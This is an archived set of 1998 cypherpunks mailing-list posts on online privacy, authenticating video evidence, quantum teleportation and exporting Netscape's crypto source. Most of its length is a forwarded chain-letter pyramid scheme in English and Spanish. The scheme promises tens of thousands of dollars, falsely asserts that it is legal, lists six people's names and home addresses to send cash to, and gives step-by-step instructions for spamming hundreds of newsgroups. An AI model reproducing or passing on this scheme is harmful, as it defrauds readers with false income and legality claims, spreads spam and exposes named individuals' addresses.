W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 28 Jan 1998 08:44:01 +0800
To: cypherpunks@cyberpass.net
Subject: FC: Getting caught on the Net, by Rebecca Eisenberg
Message-ID: <v0300780db0f42f0d9fce@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



>X-POP3-Rcpt: declan@relay.pathfinder.com
>Date: Tue, 27 Jan 1998 16:10:15 -0800 (PST)
>From: Declan McCullagh <declan@well.com>
>To: politech@vorlon.mit.edu
>Subject: FC: Getting caught on the Net, by Rebecca Eisenberg
>MIME-Version: 1.0
>Sender: owner-politech@vorlon.mit.edu
>Reply-To: declan@well.com
>X-Loop: politech@vorlon.mit.edu
>X-URL: Politech is at http://www.well.com/~declan/politech/
>
>**********
>
>http://www.examiner.com/skink/skinkJan25.html
>
>San Francisco Examiner  --  Net Skink
>
>Jan 25, 1998
>Getting caught on the Net
>
>A wave of shock has washed over the Net population in the
>past two weeks. What you write on the Internet, people
>realized, can actually get you fired.
>
>First came the news that Timothy McVeigh, not the bomber
>but a 17-year Navy veteran and crew chief on a nuclear
>submarine, was recommended for honorable discharge by the
>Navy for describing himself as gay on his AOL profile.
>
>[...]
>
>For better or for worse, there is not much privacy on-line.
>That is the benefit of free expression -- the free
>expression we won when the Supreme Court overturned the
>overly broad and unconstitutional Communications Decency
>Act. However, freedom of expression does not come with a
>guarantee that everyone will like what you say.
>
>"Privacy is not a right, but a preference," writes Declan
>McCullagh, 26, Internet expert and journalist in
>Washington, D.C. "Some people want it more than others."
>Although we are protected from intrusions by the
>government, the free exchange of information between
>private parties drives the marketplace and the media.
>
>"The best solution to harmful disclosures is to avoid them
>in the first place. Patronize banks, hardware stores and
>Internet providers with strong privacy policies," McCullagh
>says. "Privacy advocates who call for new government powers
>are missing the point. The government intrudes more on our
>privacy than corporations ever can.
>
>"On a more practical note," he continues, "technological
>solutions are the only ones that have half a chance of
>working globally. Maybe after years of lobbying, you get a
>privacy law passed in the U.S., but the Web site you want
>to shut down moves to Anguilla 30 minutes later."
>
>[...]
>
>
>
>--------------------------------------------------------------------------
>POLITECH -- the moderated mailing list of politics and technology
>To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
>subscribe politech
>More information is at http://www.well.com/~declan/politech/
>--------------------------------------------------------------------------
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 28 Jan 1998 02:49:39 +0800
To: cypherpunks@ssz.com
Subject: Re: Video & cryptography...
Message-ID: <199801271841.TAA15985@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Remember what your target is here.  (Focus, Pinky!)

The ultimate goal is that you're trying to convict a suspect of some wrongdoing in a courtroom, and you would like to use as evidence a piece of video footage.  But now, in addition to the old standard of "chain of possession" whereby a police officer logs when s/he receives the evidence, who has accessed it in the lab, storage, etc., you may now be required to establish the "truth" of the video -- was it forged, staged, or altered?  Can the defense convince a jury that a video is not what it appears to be?

Look at the O.J. case where they convinced people that a piece of DNA might not have been his.  What a load of malarkey they heaped upon those people, and shame on the prosecution for not going back and matching up another 50 markers, dropping the chances of an error from 1 in 3*10^12 to 1 in 3*10^60.  (Ultimately, it wouldn't have mattered of course because they pointed out other "flaws" in the chain of possession, specifically the FBI crime lab.  Why they might have had a *different* case with O.J.'s blood is beyond me...  They could have retested the DNA from every cell in evidence on that trial, found only Nicole's, Goldman's and Simpson's DNA, and STILL they would have gotten it thrown out, because jurors are incapable of understanding math.)

What this means to us is that, in a courtroom, a signed piece of digital tape will probably be accepted the same as an unsigned piece of analog tape.  The courts have already established precedent that says that the scientific method has less value than an overpriced lawyer.

Think about it:  what we strive for as a cryptographic proof means less than the unsworn audio tape from a 21 year old intern.  If some lawyer wants to challenge a piece of video, and can throw enough money at it, s/he's going to win.  You're better off spending money training the persons operating the VCR, because that's the defense's next point of attack.

The idea behind the digitally signed video frames is that the video "consumer" (the persons who shot and recorded the video) probably didn't edit the video to falsify some evidence, and that the person who built the camera is willing to go to court to testify that their video is not tampered with.  As a video "consumer", you're willing to pay for a witness from the video equipment supplier to come testify that you didn't edit their video.  It theoretically (in a certain, very limited subset of theory) eliminates the "Rising Sun" plotline where someone edited the digital video.

Now, we all know that since you can falsify the video by all kinds of other means, the only thing it really accomplishes is it adds a float to the parade going past the jury.  And whoever has the prettiest parade wins "justice", right?

At 05:02 PM 1/26/98 -0500, Adam Shostack wrote:
>Jim Choate wrote:
>| > From: Adam Shostack <adam@homeport.org>
>| > Subject: Re: Video & cryptography...
>| > Date: Mon, 26 Jan 1998 13:56:57 -0500 (EST)
>| 
>| > Schneier, Wagner and Kelsey have done some work on an authenticating
>| > camera.
>
>Dave points out that this was Schneier, Hall and Kelsey.
>
>| > One issue to be concerned with is that what the camera sees is not
>| > always the truth.  Putting a film set together to film bigfoot is
>| > easy.  The fact that the film is authenticated as having come from the
>| > camera doesn't mean a whole lot in some cases.
>| 
>| Doesn't this same sort of issue arise from any other digital signature
>| process then? There should be nothing fundamentaly different between the
>| characteristics of a video camera signing a frame than a person signing
>| email.
>
>	It arises in a different context; with a signature on paper,
>you're generally indicating that you've read and consented to whats on
>the paper, not that you created it.  The meaning of a camera signing a
>video still is not obvious to me.  Is it intended to be 'this is what
>we saw through the lens?' or 'this is what really happened?'
>
>Adam






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Wed, 28 Jan 1998 11:59:14 +0800
To: Jim Choate <cypherpunks@cyberpass.net
Subject: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
In-Reply-To: <199801272132.PAA01922@einstein.ssz.com>
Message-ID: <v03102800b0f45774adc0@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



>ANOTHER VERSION OF QUANTUM TELEPORTATION is
>being published by researchers in Italy and England (Francesco
>DeMartini, University of Rome, demartini@axcasp.caspur.it).  Like
>the Innsbruck teleportation scheme published several weeks earlier
>(Update 351), this demonstration employs a pair of entangled
>photons.   Whereas the Innsbruck experiment teleported the
>polarization value of a third, distinct "message photon" to one of
>the entangled photons, the Rome scheme encodes one of the
>entangled photons with a specific polarization state and transmits
>this state to the other entangled photon. Although different from the
>Innsbruck experiment (which had a 25% teleportation success rate)
>and the original theoretical proposal for teleportation, this scheme
>works 100% of the time if the receiver applies the right
>transformations on the second photon.

I wonder how far off use of this technique for interplanetary rovers might
be (10 years, 20 years)?  Remote (Earth) rover manipulation is tedious at
best due to several minutes (or an hour or more to the outer planets) of
propagation delay.  Autonomous rovers need enough smarts built-in to handle
unexpected situations, a non-trivial problem.  An alternative is to
establish a link using entangled photons. If a simple approach to saving
these entangled states during signal transit, in both directions, were
found instantaneous communication and simplified remote control would be a
reality.

Of course one needn't stop there.  If entangled states could be stored for
several years, instantaneous communication with neighbooring stars is a
real possibility.  Coupled with advances in mind-machine science it might
someday be possible to explore, first-hand, our local portion of the galaxy
without leaving earth, or upload/download one's consciouness to vessels in
remote locations.

Speaking of which, do the current SETI programs check for signal modulation
using polarization.  If we've discovered this trick, sure so have other
intelligent life forms.  Most natural sources of radiation tend to
unpolarized, so a rapidly flucuating polar modularion might easily appear
to be noise.

--Steve







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 28 Jan 1998 08:16:08 +0800
To: nobody@REPLAY.COM
Subject: Re: Netscape 5 will be GPL'ed
In-Reply-To: <199801271453.PAA17516@basement.replay.com>
Message-ID: <199801272012.UAA00372@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous writes:
> At 07:26 PM 1/26/98 -0800, Tom Weinstein  wrote:
> >Don't hold your breath.  We're still bound by US export regulations, so
> >we won't be able to export crypto-relevant source code.  We'll release what
> >we can, but you probably won't be satisfied.
> >
> >Of course, there's always the option for some enterprising individuals
> >outside the US to replace the missing pieces.
> 
> Or you can print those sections in a book and let some enterprising
> foreigners OCR scan them.

Could this process not be simplified by Netscape (hint Tom) having a
non-exportable version of the source including all crypto code.

Then an interested third party may print it on paper and snail it out
of the US, or simply make use of a remailer; either way once it is
outside the US we have legal full strength netscape.

Another area which could use some attention is that the netscape
distribution license seems to result in large european ftp sites
carrying only the 40 bit version.  Anything that would free up the
license might encourage more sites to carry the 128 bit versions.
(Such as carried by replay.com and others).

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Tue, 27 Jan 1998 12:25:31 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Executing Kaczynski
Message-ID: <3.0.5.32.19980127201813.008249e0@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Ze Cornflake inquired of TCM:

>> Recall that a leading Cypherpunk was suspected
>>for a while as being the Unabomber.
>
>whoa, are you being facetious here or what? would you care to elaborate
>on that little tidbit?
.................................................

It was TCM himself.

(myself, I speculated it was Detweiler.)
    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tgustavo.sanjuan@interredes.com.ar (Transportes Gustavo S.R.L.)
Date: Wed, 28 Jan 1998 07:33:11 +0800
To: cypherpunks@toad.com
Subject: Easy Money
Message-ID: <19980127231625703.ABC236@lizard>
MIME-Version: 1.0
Content-Type: text/plain



This is it! 
THE MOST PHENOMENAL WEALTH-BUILDING BONANZA IN HISTORY. 
A once-in-a-lifetime opportunity for you to upgrade the
quality of your life forever. 
Your chance to automatically capitalize on the historic 
outpouring of humanity on to the Internet. 
(It will only happen once ... and it's happening RIGHT NOW!)
Take just four minutes to discover the secret that WILL
IMMEDIATELY CHANGE YOUR LIFE. (Do you *really* have
something else to do more important than THAT?)
You are about to embark upon a wonderful journey to amass a
small fortune in a short time. (Even a LARGE fortune, if you
choose to devote some effort.) It's easy and fail proof. All you
have to do is take the first step. You've paid your dues; you
deserve it. Now it's your turn.
WITHIN 90 DAYS, YOU'LL HAVE MORE THAN $50,000
... and that's just the beginning!

HOW IS THAT POSSIBLE? Simple: To begin with, realize that there
were only about two-million Internet "host sites" in 1994 --
yet that number had soared to around 20 million by the end of
1997. In other words, the rate of Internet growth is geometric
-- like 2, 4, 8, 16, 32, etc. And, for the moment, even THAT
rate is accelerating.
Now, the most famous example of a host site is aol.com,
America Online(tm). It, by itself, has over ten-million people
as members. (Not all host sites have members, though.)
HERE'S THE IMPORTANT PART:
Following the present trend, the number of host sites will
skyrocket to nearly ONE HUNDRED MILLION during 1998. And
that's just the host sites! Now, imagine how many individual
PEOPLE are rushing on line for the first time ... right now
... this very instant.
This creates tremendous opportunity for you. But there's no time
to waste! (How long can THAT growth rate continue? Oh, sure,
it will keep growing -- just not at the historic 1998 rate.)
IF YOU'RE WAITING FOR YOUR SHIP TO COME IN, THIS IS IT.
(Don't let it sail away without you.)
So here it is, the easiest money-generating system you'll ever
hear about. One that's showing extraordinary appeal to an
ever-expanding mass of people who feel the need for additional
income. And YOU can help them fulfill that need.
HERE'S YOUR CHANCE TO MAKE A DIFFERENCE.
HOW? In short, by developing a mailing list of people who need
extra money. (I know: it doesn't seem very exciting yet, but
keep reading.) And people will pay you to be on your list. A LOT
of people. (See: it's already starting to sound better.) Let's
go through it step by step so you'll know exactly what to do ...
and why (Step #4!) so many people feel hope again.
If you've seen a lot of posts like this, you already have PROOF
that THIS SYSTEM WORKS.
____________________STEP 1._________________
You will need these instructions later; so save them on your
hard drive. (FILE then SAVE. If you have a choice, choose a
"text" or "ASCII" file type.) Now print these instructions so
you can read them more easily. (Go ahead, I'll wait for you ...)
____________________STEP 2._________________
This is the step where you invest money. Less than $10. (Try not
to cry.) About the same as the price of a movie ticket, or a
12-pack of beer, or a few lottery tickets. In this "lottery,"
however, YOU control the results.
YOU CANNOT AFFORD *NOT* TO DO THIS.
On a sheet of paper, write "Processing fee to add me to your
mailing list". (You, too, are one of those people wanting extra
income, aren't you? Besides, the inherent value of being on that
mailing list is what makes this a legal program. [The relevant
American laws are in the United States Code, Title 18, 1302,
1341, and 1342.])
Fold the sheet around a US $1 bill. Mail this to the List Manager
in Position A, located at the end of these instructions. Double-
check the postage for any mail going outside your country.
Repeat that for the other List Managers.
___________________STEP 3.__________________
Use Notepad (preferably) or some other word processor to open
the file you saved in Step 1. Scroll to the List Managers
section. Delete the name and address under Position F. Move the
name and address from Position E down to Position F. Then, in
order, move each of the others down one until Position A is left
vacant. That's where your name and address go! Double check your
address: whatever is there is where all your money will go. Save
the file. (If you don't have Notepad, be sure to save it as an
"ASCII" or "text" file.)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~        NOW, HERE'S THE MAGIC PART . . .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____________________STEP 4._________________
THIS STEP MAKES ALL THE DIFFERENCE IN THE WORLD. It's also where
you invest a little time. As much as four hours, if you use
America Online. (Try not to cry.) If it'll be easier on you,
take an hour per day. Skip those X Files episodes you've already
seen twice. In THIS show, YOU control the ending.
All those people coming on line for the first time. Nearly
TWO-THOUSAND NEW PEOPLE PER DAY
... and growing! Where do they go?
Sooner or later --but usually immediately-- they go to the
newsgroups. Isn't that where YOU discovered this opportunity?
Over 40,000 newsgroups, now, and that's growing, too. (There's
a list of 49,000 at ftp://ftp.alt.net/pub/news/active.)
So, simply take the file you saved in Step 3 and post it to some
newsgroups. Three hundred, to be precise. (How? See below.)
How many people will be exposed to your offer during the two
weeks your post will remain in the newsgroup? Depending on how
you choose the newsgroups, anywhere from 10,000 to
OVER A MILLION PEOPLE WILL SEE YOUR OFFER.

The implications of that are down right staggering. Even more
so than it might seem! (See the Example section, below --
especially the first and last paragraphs.)
___________________STEP 5.__________________
Now begins the greatest money-making exprience of your life!
In about a week, you start receiving requests and processing
fees from opportunity seekers around the world. And they all
want to be added to your mailing list.
WHY do they want to do this? Well, for the most of the same
reasons YOU want to do this!
What will you do with all those requests? It's up to you. For
example, you can sell them to professional list brokers, found
in the Yellow Pages, who will see that offers are sent out.
You can take up exotic-stamp collecting. To some of the
addresses, you might even send these instructions: Most people
want to jump right back in again as soon as their name moves out
of Position F; after all, they already KNOW how well this works!
And, what will you do with all that money? That, also, is up to
you. (You can think of something, can't you?)
____________________________________________
                    Example

This example assumes that you post, one time, to just 300
newsgroups, with an average readership of merely 100 people
during the dozen days your message stays on file. It assumes
that VIRTUALLY EVERYONE --9,998 out of every 10,000 potential
readers-- does NOT even see your opportunity, does NOT read
it, or is already involved or, in any case, does NOT take any
action.
In marketing terms, this assumes a response rate of merely one
fiftieth of one percent (0.0002). That's considered almost no
response at all! (NOW can you see why this works so well?)
You in Position A:
Only 6 respond to your efforts.               6 x $1 =      $6
You in Position B:
Only 6 respond to each of the 6 in A.        36 x $1 =     $36
You in Position C:
Only 6 respond to each of the 36 in B.      216 x $1 =    $216
You in Position D:
Only 6 respond to each of the 216 in C.   1,296 x $1 =  $1,296
You in Position E:
Only 6 respond to each of the 1296 in D.  7,776 x $1 =  $7,776
You in Position F:
Only 6 respond to each of the 7776 in E. 46,656 x $1 = $46,656
                                                       _______
                                          Your income  $55,986
If, however, these people each get a mere 8 responses (out of
30,000 people!), your income increases to well over a quarter
of a million dollars!
PEOPLE ARE TRULY ACCOMPLISHING THIS. RIGHT NOW! *WHY NOT YOU?*
How? The details are in your hands this very instant. THAT'S IT.
All you have to do is actually begin.
You may even wish to try for 20 people. You literally won't
believe how much THAT produces. So, do the numbers for yourself.
(I'll give you two hints: a. For ten, it's 10 x 10 x 10 x 10 x
10 x 10 = $1,000,000. b. Have you heard of a "sixty-four million
dollar question"?) You just might end up wanting to spend a few
DAYS posting, and to take it to a few of your friends. But start
-- start today -- and start with just 300 newsgroups.
THIS IS THE MOMENT YOU'VE BEEN WAITING FOR.
__________How To Post To Newsgroups_________
To post, just "cut and paste": Highlight the entire text of
these instructions. Choose EDIT then COPY. You only need to do
that once. Here's the part you repeat: Go to the newsgroup.
Click on Send New Message, Post Article, To News, or whatever
applies. Type your headline in the Subject box. (Some subject
heading samples are listed below.) Go to the Message box. Paste
these instructions by holding down your Ctrl key while you
depress the letter V. Click on Send, OK, or whatever is there.
STEP-BY-STEP DIRECTIONS FOR AMERICA ONLINE: Go on line. Click on
the Internet globe at the bottom of your Welcome page. Edit the
Web Address window to read --without the quotes--
"http://members.aol.com/TouchMidas/private/aol-gold.txt". Click
on Go To The Web. When you see the directions, print them out by
clicking on the printer icon at the top of your screen. (If you
receive a "URL Not Found" error, carefully re-type the address.
If the it seems to have been discontinued, try this address:
"http://home1.gte.net/docthomp/AOL.htm".)
___________Sample Subject Headings__________
.A Once-In-A-Lifetime Opportunity
.How You Can Make $25,000 Per Month
.How To Re-Invent Your Life
.The Greatest Wealth-Building Bonanza In History!
.Upgrade The Quality Of Your Life
.FA$T, EA$Y MONEY! <-- Why you see so many of these:
.Work At Home With Your Computer
.Financial Independence
.!                     >  FA$T, EA$Y MONEY!  <
.Income Opportunity
.Be a millionaire in 1998
.Make money with your computer
.!!$$ Hard Fast Cash $$!!
.Immediate Internet Income At Home (complete instructions)
.Safe Income Now
.$$ Need Cash? $$
.!               Earn THOU$AND$ posting to newsgroups!
.Income From The Internet
.Yes, you can make money working from home
.MAKE MONEY FA$T & EA$Y
.Home-Based Business Opportunity
.Internet Income <-Why you're gonna see more of this
You're really here; you made it! Congratulations on your
breakthrough to financial independence and an enhanced quality
of living. Or...
********************************************
*       WHAT ARE YOU WAITING FOR?
********************************************
Maybe things like this never work for you? (You are surely
correct ... unless you're already grabbing an envelope.) You
tried something like this before? (Have you *REALLY* ever
reached 30,000 people before?) Maybe you'll only get $10,000?
(Life is cruel.) Maybe you're already making $2,000 per hour?
Maybe nobody else will do this? (Look around the newsgroups:
they already ARE doing this. How much proof do you need?) Then,
maybe everyone else is already doing this? (Definitely NOT!
But you'll END UP being right if you keep putting this off.)
"I'll do it later, really!" (Yeah, right.) Maybe the Easter
Bunny will change your life, so you won't have to bother? Is
the price of a movie ticket truly more important than your
future?
GO FOR THE GOLD: What have you got to lose?
!-------REMEMBER, follow these steps and be honest,
        and the money will pour in!
________________List Managers_______________

#1 B. Spiegeleer
31 rue de la Montagne de l'Esperou
75015  Paris
Francia

#2 C. Leyton
Bulnes 737
San Bernardo, Santiago
Chile

#3 A. Curth 
Azcuenaga 1360 PB2
Buenos Aires, CF 1115
ARGENTINA

#4 L Mastrogiacomo
Maip 596 1er piso
Merlo (1722) Buenos Aires
ARGENTINA

#5 P. Oregioni
Salta 662
Merlo (1722) Buenos Aires
Argentina

#6 A. Alvarez
Chopin 149 norte
Santa Lucia (5411) San Juan
Argentina


Note:  If you don't read spanish send me an e-mail and I will send you
a translated copy. Believe me, IT's WORTH IT! acurth@usa.net

----- Las puertas del ao se abren,
----- como las del lenguaje,
----- hacia lo desconocido.
----- Anoche me dijiste:
----- maana habr que trazar unos signos,
----- dibujar un paisaje, tejer una trama
----- sobre la doble pgina
----- del papel y del da.
----- Maana habr que inventar de nuevo,
----- la realidad de este mundo.
Octavio Paz

________________________________________________
This is a true story! Esta historia es Real!

Das atrs, cuando "navegaba" por estas pginas de Newsgroups, 
as mismo como Ud. lo esta haciendo ahora, se me apareci un artculo 
similar a este que deca que uno puede ganar miles de dlares en pocas 
semanas con una inversin de $6.00!. Enseguida pens, "Oh no! otra 
estafa ms?", pero como la mayora de nosotros, la curiosidad pudo 
ms, y segu leyendo.
Y segua diciendo que Ud. enviar $1.00 a cada uno de los 6 nombres y 
direcciones mencionados en este artculo. Entonces Ud. anota su nombre 
y direccin al final de la lista reemplazando al #6, y enve o ponga 
este artculo a por lo menos 200 "Newsgroups"(Hay miles de estos en 
todo el mundo).

Ningn truco, eso fue todo. La gran diferencia entre este sistema y 
otros es que Ud. tiene una lista de 6 en vez de 5... Esto significa 
que su promedio de ganancia ser aproximadamente 15 veces mayor!!!
Despus de pensarlo una y otra vez, y consultar con unos amigos 
primero, decid probarlo. Pens que lo nico que podra perder eran 6 
estampillas y $6.00, verdad?.
Como probablemente muchos de nosotros, estaba un poco preocupado por 
la legalidad de todo esto. Entonces consult en las oficinas del 
Correo Central y me confirmaron que en realidad era legal!! .
Entonces invert mis $6.00......IMAGNENSE QU!!!...a los 7 das, 
empec a recibir dinero por correo!!!.
Estaba sorprendido! todava pensaba esto terminar enseguida, y no 
pens ms en otra cosa. Pero el dinero segua llegando. En mi primera 
semana hice unos $20.00 a $30.00 dlares. Para el final de la segunda 
semana tenia hecho un total de ms de $1,000.00!!!!! En la tercera 
semana recib ms de $10,000.00 y todava segua llegando ms. 
Esta es mi cuarta semana ya hice un total de ms de $41,000.00 y 
esto sigue llegando ms rpidamente(mi esposa e hijos se pasan abriendo los
sobres y yo consiguiendo "Newsgroups"). Esto se puso serio!!!! Todo esto
realmente vali la inversin de $6.00 y 6 estampillas. Me gastaba ms que
esto en sorteos y loteras!! 

Permtanme explicarles como funciona esto y lo ms importante el por 
qu funciona....tambin, Ud. asegrese de imprimir una copia de este 
artculo AHORA, para poder sacar toda la informacin a medida que lo 
necesite. El proceso es muy fcil y consiste en 3 pasos sencillos: 

PASO No. 1: Obtenga 6 hojas de papel y escriba en cada una de ellas:
"FAVOR DE INCLUIRME EN SU LISTA DE CORRESPONDENCIA O E-MAIL".
Ahora consiga 6 billetes de US$1.00 dlar e introduzca cada dlar en 
un sobre con la hoja de manera que el billete no se vea a travs del 
sobre!! Mejor ponerlo encerrado en un papel de color oscuro para 
prevenir robos de correspondencia. 

**OPCIONAL: Mande una tarjeta postal de su ciudad o pas.

Ahora Ud. debera tener 6 sobres sellados y en ellos un papel con la 
frase mencionada, su nombre y direccin, y un billete de $1.00 dlar. 
Lo que Ud. esta haciendo con esto es crear un "servicio" y eso hace 
que esto sea ABSOLUTAMENTE LEGAL!!

Enviar los 6 sobres a las siguientes direcciones:

#1 B. Spiegeleer
31 rue de la Montagne de l'Esperou
75015  Paris
Francia

#2 C. Leyton
Bulnes 737
San Bernardo, Santiago
Chile

#3 A. Curth 
Azcuenaga 1360 PB2
Buenos Aires, CF 1115
ARGENTINA

#4 L Mastrogiacomo
Maip 596 1er piso
Merlo (1722) Buenos Aires
ARGENTINA

#5 P. Oregioni
Salta 662
Merlo (1722) Buenos Aires
Argentina

#6 A. Alvarez
Chopin 149 norte
Santa Lucia (5411) San Juan
Argentina

PASO NO. 2: Ahora elimine el #1 de la lista de arriba y mueva los 
otros nombres un nmero para arriba (el #6 se convierte en #5, 
el #5 se convierte en #4, Etc.) y agregue SU NOMBRE y direccin como 
el #6 en la lista.

PASO No. 3: Cambie todo lo que crea conveniente de este artculo, 
pero trate de mantenerlo lo ms posible cercano al original. Ahora 
ponga su artculo en por lo menos 200 "Newsgroups"(existen ms 
de 24,000 grupos).
Solo necesita 200, pero cuando ms cantidad lo ponga, ms dinero le 
llegar!!!. 




Aqu van algunas indicaciones de como introducirse en los 
"Newsgroups":
--------------------------------------------------------------
COMO MANEJAR LOS "NEWSGROUPS"
--------------------------------------------------------------
No.1> Ud. no necesita redactar de nuevo toda esta carta para hacer 
la suya propia. Solamente ponga su cursor al comienzo de esta carta, 
haga click y lo deja presionando y bjelo hasta el final de la carta 
y lrguelo.
Toda la carta deber estar "sombreada". Entonces, apunte y haga click 
en "edit" arriba de su pantalla, aqu seleccione "copy. Esto har que 
toda la carta quede en la memoria de su computadora. 

No.2> Abra un archivo "notepad" y lleve al cursor arriba de la pgina 
en blanco. Presione "edit" y del menu seleccione "paste". Ahora 
tendr esta carta en el "notepad" y podr agregar su nombre y 
direccin en el lugar #6 siguiendo las instrucciones de ms arriba.  
No.3> Grave esta carta en su nuevo archivo del notepad como un .txt 
file. Y cada vez que quiera cambiar algo ya lo puede hacer.

----------------------------------------------------------------
PARA LOS QUE MANEJAN COMMUNICATOR
----------------------------------------------------------------
Seleccione "message center".
1- Haga doble click sobre "News".
2- Aparecer la ventana "Subscribe to Discussion Groups".
3-Seleccione los grupos a suscribirse.
4-Presione "suscribe".
5- Presione "OK".
6-Ahora seleccione desde "news" un servidor y mande este documento.
----------------------------------------------------------------
PARA LOS QUE MANEJAN NETSCAPE
----------------------------------------------------------------
No.4> Dentro del programa Netscape, vaya a la "ventana" titulada 
:Window" y seleccione "netscapeNews". Entonces elija del menu 
"Options", seleccione "Show all Newsgroups". En segundos una lista 
de todos los "Newsgroups" de su "server" aparecer. Haga click en 
cualquier newsgroup.

De este newsgroup haga click debajo de "TO NEWS", el cual deberia 
estar arriba, en el extremo izquierdo de la pgina de Newsgroups. 
Esto le llevar a la caja de mensajes.

No.5> Llene este espacio. Este ser el ttulo que vern todos cuando 
recorran por la lista de un grupo en particular. 

No.6> Marque el contenido completo del .txt file y copie usando la 
misma tcnica anterior. Regrese al Newsgroup "TO NEWS" y Ud. esta 
creando y empastando esta carta dentro de su programa o "posting". 

No.7> Presione "send" que est en la parte superior izquierda.

Y UD. HA FINALIZADO CON SU PRIMERO!...CONGRATULACIONES!!! .

----------------------------------------------------------------
LOS QUE USAN INTERNET EXPLORER
----------------------------------------------------------------
PASO No. 4: Vaya al Newsgroups y seleccione "Post an Article.
PASO No. 5: Carge el artculo.
PASO No. 6: Repita el No.6> ms arriba.
PASO No. 7: Presione el botn "Post".
--------------------------------------------------------
________________________________________________________

ES TODO!. Todo lo que tiene que hacer es meterse en diferentes 
"Newsgroups" y empastarlos, cuando ya tenga prctica, solo le 
tomar unos 30 segundos por cada newsgroup!
**RECUERDE, CUANTOS MS NEWSGROUPS CONSIGA, MS RESPUESTAS (Y DINERO)
RECIBIR!! PERO DEBE DE ENTRAR EN POR LO MENOS 200**
YA ESTA!!!.... Ud. estar recibiendo dinero de todo el mundo, de 
lugares que ni conoce y en unos pocos das!. Eventualmente querr 
rentar un P.O.Box por la cantidad de sobres que ir recibiendo.

**ASEGRESE DE QUE TODAS LAS DIRECCIONES ESTEN CORRECTAS

Ahora el POR QU de todo esto:

#6 - De 200 enviados, digamos que recibo solo 5 respuestas 
(bajsimo ejemplo).
Entonces hice $5.00 con mi nombre en la posicin #6 de esta carta.
#5 - Ahora, cada uno de las 5 personas que ya me enviaron los 
$1.00 tambin hacen un mnimo 200 Newsgroups, cada uno con mi 
nombre en el #5 de la lista y solo responden 5 personas a cada 
uno de los 5 originales, esto hace $25.00 ms que yo recibo
#4 - Ahora estas 25 personas pone un mnimo de 200 Newsgroups 
con mi nombre en el #4 y solo se recibe 5 respuestas de cada uno. 
Estara haciendo otros $125.00 adicionales.
#3 - Ahora esta 125 personas ponen sus mnimo de 200 grupos con 
mi nombre en el #3 y solo recibe 5 respuestas cada una, yo recibo 
un adicional de $625.00!.
#2 - OK, aqu esta la parte ms divertida, cada una de estas 625 
personas ponen sus cartas en otros 200 grupos con mi nombre en el 
#2 y cada una recibe solo 5 respuestas, esto hace que yo reciba 
$3,125.00!!!. 
#1 - Estas 3,125 personas enviarn este mensaje a un mnimo de 
200 Newsgroups con mi nombre en el #1 y si solo 5 personas 
responden de los 200 grupos, estar recibiendo $15,625.00!!.

De una inversin original de $6.00!! ms estampillas. FABULOSO! 
Y como dije antes, que solo 5 personas respondan muy poca, el 
promedio real seria 20 o 30 personas!. Asique pongamos estos 
nmeros a calcular.

Si solo 15 personas responden, esto hace:
en la #6 $15.00
en la #5 $225.00
en la #4 $3,375.00
en la #3 $50,625.00
en la #2 $759,375.00
en la #1 $11,390,625.00

Una vez que su nombre ya no esta en la lista, saque el ultimo 
anuncio del Newsgroup y enve otros $6.00 a los nombres en esa 
lista, poniendo su nombre en el #6 y repetir todo el proceso. 
Y empezar a ponerlos en los Newsgroups otra vez.
Lo que debe recordar es que miles de personas ms, en todo el 
mundo, se conectan al Internet cada da y leern estos artculos 
todos los das como USTED Y YO LO HACEMOS!!!. 

As que creo nadie tendra problemas en invertir $6.00 y ver si 
realmente esto funciona. Algunas personas llegan a pensar..."y 
si nadie decide contestarme?"
Que!! Cul es la chance de que esto pas cuando hay miles y 
miles de personas honestas (que como nosotros) buscan una manera 
de tener independencia financiera y pagar cuentas!!!., y estan 
dispuestas a tratar, pues "No hay peor lucha de la que no se hace". 
Se estima que existen de 20,000 a 50.000 nuevos usuarios TODOS LOS DIAS!
(en todo el mundo)

*******************************************
OTRO SISTEMA PARA COMUNICARSE ES CONSIGUIENDO E-MAIL DE PERSONAS 
PARTICULARES, DEBE SER POR LO MENOS 200 DIRECCIONES, Y ESTO TIENE 
UNA EFECTIVIDAD DE MINIMO 5% AL 15%. SI SOLO BUSCAN PERSONAS QUE 
HABLAN ESPAOL, VAYAN A UN PROVEEDOR DE E-MAILS E IMPRIMAN UN 
APELLIDO LATINO Y YA.

Recuerde de hacerlo esto en forma CORRECTA, LIMPIA Y HONESTAMENTE 
y funcionar con toda seguridad. Solamente tiene que ser honesto. 
Asegrese de imprimir este artculo AHORA, Trate de mantener la 
lista de todos los que les envan dinero y siempre fjese en los 
Newsgroups y vea si todos estn participando limpiamente. 
Recuerde, HONESTIDAD ES EL MEJOR MTODO.
No se necesita hacer trucos con la idea bsica de hacer dinero en esto!
BENDICIONES PARA TODOS, y suerte, juguemos limpio y aprovechar 
